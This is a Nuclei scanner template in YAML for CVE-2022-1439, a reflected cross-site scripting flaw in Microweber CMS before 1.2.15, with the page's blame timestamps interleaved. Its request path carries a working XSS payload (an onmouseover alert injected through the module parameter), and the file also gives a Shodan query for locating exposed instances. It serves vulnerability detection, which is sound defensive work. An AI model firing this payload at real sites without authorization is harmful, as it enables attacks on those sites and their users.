nuclei-templates/http/cves/2022/CVE-2022-1439.yaml

49 lines
2.2 KiB
YAML
Raw Normal View History

id: CVE-2022-1439
info:
name: Microweber <1.2.15 - Cross-Site Scripting
author: pikpikcu
severity: medium
description: Microweber prior to 1.2.15 contains a reflected cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
2023-09-06 11:59:08 +00:00
remediation: |
Upgrade to Microweber CMS version 1.2.15 or later, which includes proper input sanitization to mitigate the XSS vulnerability.
reference:
- https://huntr.dev/bounties/86f6a762-0f3d-443d-a676-20f8496907e0/
- https://huntr.dev/bounties/86f6a762-0f3d-443d-a676-20f8496907e0
- https://github.com/microweber/microweber/commit/ad3928f67b2cd4443f4323d858b666d35a919ba8
- https://nvd.nist.gov/vuln/detail/CVE-2022-1439
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-1439
cwe-id: CWE-79
epss-score: 0.001
epss-percentile: 0.40832
2023-09-06 11:59:08 +00:00
cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: microweber
product: microweber
2023-09-06 11:59:08 +00:00
shodan-query: http.favicon.hash:780351152
tags: cve,cve2022,microweber,xss,huntr
http:
- method: GET
path:
- '{{BaseURL}}/module/?module=%27onm%3Ca%3Eouseover=alert(document.domain)%27%22tabindex=1&style=width:100%25;height:100%25;&id=x&data-show-ui=admin&class=x&from_url={{BaseURL}}'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<div class='x module module-'onmouseover=alert(document.domain) '"
- "parent-module-id"
condition: and
2023-07-11 19:49:27 +00:00
- type: status
status:
- 200
# digest: 490a00463044022006e537ec9a61627cf617b2dbdaf5b7a468bb0c6cd06b6c8d58e30ef2e9276e6d0220670f1aad94a2c838ee9a1d062a7ddcfc6b75cb22dd5ee320e01226fac1826c0c:922c64590222798bb761d5b6d8e72950